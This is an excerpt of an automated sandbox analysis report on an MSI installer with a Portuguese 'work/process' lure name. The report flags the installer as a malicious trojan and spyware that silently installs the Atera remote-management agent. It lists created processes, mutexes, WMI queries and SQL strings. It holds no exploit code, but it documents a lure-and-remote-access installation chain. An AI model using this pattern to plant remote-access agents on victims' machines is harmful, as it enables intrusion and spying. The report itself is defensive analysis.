                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB8C103737_2_00007FFAAB8C1037
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB8C455737_2_00007FFAAB8C4557
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB8CFC8837_2_00007FFAAB8CFC88
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB8C106937_2_00007FFAAB8C1069
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB984EA837_2_00007FFAAB984EA8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAAB9931F037_2_00007FFAAB9931F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAABB3BB6F37_2_00007FFAABB3BB6F
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAABB2CB3837_2_00007FFAABB2CB38
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAABB202C837_2_00007FFAABB202C8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAABB33EBC37_2_00007FFAABB33EBC
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFAABB33EF037_2_00007FFAABB33EF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFB030006B0 appears 145 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFB03001D30 appears 114 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFB03001B70 appears 102 times
                                Source: System.ComponentModel.Primitives.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Private.Xml.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Runtime.Numerics.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Runtime.InteropServices.RuntimeInformation.dll.2.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-memory-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Net.Ping.dll.2.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Diagnostics.FileVersionInfo.dll.2.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l2-1-0.dll.2.drStatic PE information: No import functions for PE file found
                                Source: mscorrc.dll.2.drStatic PE information: No import functions for PE file found
                                Source: Microsoft.CSharp.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Net.Primitives.dll.2.drStatic PE information: No import functions for PE file found
                                Source: System.Security.Cryptography.Encoding.dll.2.drStatic PE information: No import functions for PE file found
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiBinary or memory string: OriginalFilenameAlphaControlAgentInstallation.dll\ vs TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiBinary or memory string: OriginalFilenameSfxCA.dll\ vs TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiBinary or memory string: OriginalFilenamewixca.dll\ vs TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@109/899@0/10
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA NetworksJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2196:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5484:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2168:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6196:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5376:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\GenericDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_chocolatey.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\Access_ISABUS.HTP.Method
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4308:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6992:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8132:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8056:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2340:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1624:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5436:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2120:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\SNMPDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\NLogMutexTester
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\NLog-FileFileArchiveLock-c:_program files (x86)_atera networks_ateraagent_packages_agentpackagemonitoring_log.txt
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3900:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\Global\{bd59231e-97d1-4fc0-a975-80c3fed498b7}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_choco.summary.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\Access_PCI
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\HttpDevicesFileLock
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7916:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\ServerDevicesFileLock
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFE6A2605396FBB224.TMPJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI9B15.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5020687 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: SELECT Identifier, Severity, Timestamp FROM ThresholdDuration WHERE Identifier = @id;kDELETE FROM ThresholdDuration WHERE Identifier = @id;
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);kExecuteScriptAsync SystemTools Start scriptGuid : {0}Wrunscriptguid {0} 10 W10= disableSendResultC{0} {1} {2} {3} or8ixLi90Mf "{4}"
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO ThresholdDuration (Identifier,Severity,Timestamp) Values (@identifier, @severity, @timestamp) ON CONFLICT (Identifier) DO UPDATE SET Severity = excluded.Severity, Timestamp = excluded.Timestamp;
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132627E6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.000001326278B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS StatisticsSendTime (Id INTEGER PRIMARY KEY,Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);%StatisticsSendTime
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);@
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);@
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Stub (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO StatisticsSendTime (Timestamp) Values (@timestamp);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);@
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262915000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262982000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Timestamp FROM StatisticsSendTime ORDER BY Timestamp DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);sSELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262982000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Id, Name, Timestamp, Value FROM Statistics;
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);@
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: SELECT [Id], [Alerts], [Timestamp] FROM [AlertsSent] ORDER BY [Timestamp] DESC LIMIT 1;
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);/DELETE FROM Statistics;eSELECT Id, Name, Timestamp, Value FROM Statistics;
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1831057497.0000022ADA0F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL);
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;@
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.000001326286F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
                                Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: select Name from Win32_PerfFormattedData_Tcpip_NetworkInterface!DataStatsEnabled9InboundBandwidthStatsEnabled;OutboundBandwidthStatsEnabled
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262BE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT Id, IsActive, Timestamp, Name, Thresholds FROM ThresholdsProfiles ORDER BY Timestamp DESC LIMIT 1;
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiReversingLabs: Detection: 24%
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\TRABALHO----PROCESSO0014S55-S440000000S1.msi"
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 460615119F137567DDB08B202FD1B71F
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI9B15.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5020687 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIA259.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5022328 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIB4E8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5027093 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
